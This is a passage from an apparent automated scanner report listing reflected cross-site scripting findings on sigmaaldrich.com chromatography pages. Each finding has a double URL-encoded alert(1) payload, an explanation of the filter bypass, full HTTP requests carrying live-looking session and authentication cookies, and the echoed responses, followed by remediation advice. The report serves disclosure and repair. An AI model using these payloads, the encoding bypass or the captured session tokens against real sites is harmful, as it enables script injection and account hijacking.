Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28943
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography9d61b";alert(1)//12b04b3a913/syringes.html","E404") ;
   </script>
...[SNIP]...

1.30. http://www.sigmaaldrich.com/analytical-chromatography/syringes.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/syringes.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c05f%2522%253balert%25281%2529%252f%252ff52d09fd619 was submitted in the REST URL parameter 2. This input was echoed as 1c05f";alert(1)//f52d09fd619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/1c05f%2522%253balert%25281%2529%252f%252ff52d09fd619 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/1c05f";alert(1)//f52d09fd619","E404") ;
   </script>
...[SNIP]...

1.31. http://www.sigmaaldrich.com/analytical-chromatography/titration.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/titration.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1897%2522%253balert%25281%2529%252f%252fe256ad12c20 was submitted in the REST URL parameter 1. This input was echoed as f1897";alert(1)//e256ad12c20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyf1897%2522%253balert%25281%2529%252f%252fe256ad12c20/titration.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:10 GMT
Content-Length: 28944
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyf1897";alert(1)//e256ad12c20/titration.html","E404") ;
   </script>
...[SNIP]...

1.32. http://www.sigmaaldrich.com/analytical-chromatography/titration.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/titration.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d0c%2522%253balert%25281%2529%252f%252f75f1e0d8bd7 was submitted in the REST URL parameter 2. This input was echoed as 71d0c";alert(1)//75f1e0d8bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/71d0c%2522%253balert%25281%2529%252f%252f75f1e0d8bd7 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/71d0c";alert(1)//75f1e0d8bd7","E404") ;
   </script>
...[SNIP]...

1.33. http://www.sigmaaldrich.com/analytical-chromatography/vials.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/vials.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a414%2522%253balert%25281%2529%252f%252fe5c2d52ef49 was submitted in the REST URL parameter 1. This input was echoed as 8a414";alert(1)//e5c2d52ef49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography8a414%2522%253balert%25281%2529%252f%252fe5c2d52ef49/vials.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography8a414";alert(1)//e5c2d52ef49/vials.html","E404") ;
   </script>
...[SNIP]...

1.34. http://www.sigmaaldrich.com/analytical-chromatography/vials.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/vials.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0007%2522%253balert%25281%2529%252f%252f9c4b8e8fae9 was submitted in the REST URL parameter 2. This input was echoed as b0007";alert(1)//9c4b8e8fae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/b0007%2522%253balert%25281%2529%252f%252f9c4b8e8fae9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 